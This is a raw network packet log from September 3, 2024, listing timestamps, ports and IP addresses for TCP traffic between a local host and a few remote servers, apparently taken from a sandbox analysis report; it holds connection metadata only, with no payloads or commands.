Sep 3, 2024 17:13:23.609719992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609733105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609744072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609755039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609766006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609778881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609788895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609788895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609791994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609803915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609817028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609817982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609839916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609919071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609932899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609945059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609955072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609966993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609982967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610006094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610006094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610019922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610234022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610260963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610270977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610295057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610295057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610307932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610382080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610393047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610403061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610415936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610440016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610466003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610474110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610480070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610555887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610564947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610577106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610586882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610596895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610604048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.610605001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610636950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.610671997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.611501932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.611521006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.611534119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.611566067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.611597061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.611619949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.611632109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.611641884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.611651897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.611680031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.611707926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.702405930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702425957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702438116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702449083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702461004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702471018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702482939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702503920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.702543974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.702771902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702783108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702794075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702809095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.702847004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.702853918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702866077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702877045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702888966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.702899933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.702946901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.702946901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.703855991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.703875065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.703886986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.703913927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.703946114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704087019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704097986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704109907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704143047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704166889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704184055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704195023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704204082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704216003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704226971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704237938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704245090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704245090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704256058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704268932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704279900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704320908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704320908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704320908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704664946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704675913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704691887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704708099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704725027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704725027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704751015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704885006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704896927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704906940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704916954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.704941988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.704974890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705121994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705133915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705144882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705156088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705174923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705197096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705548048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705734015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705744028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705754995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705765963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705770969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705770969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705785990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705797911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705806971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705810070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705821991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705832005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705842018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705851078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705851078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705853939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705868006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705878019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705881119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705881119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705889940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.705921888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.705954075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706043005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706053972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706064939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706075907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706085920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706094980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706096888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706109047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706115961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706115961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706120968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706134081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706165075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706177950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706693888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706703901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706712961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706729889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706742048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706748962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706758976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706772089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706777096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706777096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706784010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706798077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706826925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706826925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706835985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706854105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706872940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706876040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706886053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.706937075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.706937075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.707036018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.707046986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.707056999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.707067966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.707078934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.707097054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.707097054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.707998991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708040953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708053112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708079100 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708091974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708115101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708127022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708142042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708153963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708163977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708183050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708183050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708183050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708199978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708211899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708215952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708224058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708246946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708246946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708300114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708334923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708347082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708357096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.708385944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708400011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.708770037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709281921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709292889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709302902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709337950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709337950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709434986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709445953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709455013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709485054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709525108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709537983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709547997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709559917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709562063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709572077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709583044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709583044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709583998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709597111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709608078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.709614992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709656954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.709656954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.710783958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.710798025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.710808039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.710839033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.710872889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.710983038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.710994005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.711004019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.711016893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.711036921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.711057901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.759761095 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.760116100 CEST	49737	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.765037060 CEST	80	49736	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:23.765117884 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.765857935 CEST	80	49737	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:23.765957117 CEST	49737	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.766235113 CEST	49737	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.771188974 CEST	80	49737	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:23.809313059 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:23.816143990 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:23.818373919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818387985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818408966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818418980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818428993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818440914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818450928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818460941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.818460941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.818463087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.818485975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.818512917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819128990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819149017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819160938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819170952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819179058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819189072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819199085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819199085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819202900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819215059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819225073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819236994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819247961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819257975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819257975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819289923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819492102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819504023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819513083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819523096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819534063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819545031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819549084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819549084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819560051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819571018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819581985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819581985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819607019 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819639921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819669962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819680929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819690943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819704056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819716930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819721937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819730043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819736004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819741011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819757938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819770098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819777966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819777966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819781065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819793940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819804907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819814920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.819816113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.819856882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820667982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820679903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820689917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820699930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820709944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820714951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820714951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820720911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820734024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820760012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820760012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820785999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.820801020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820811987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820822954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.820837021 CEST	80	49730	52.212.52.84	192.168.2.8
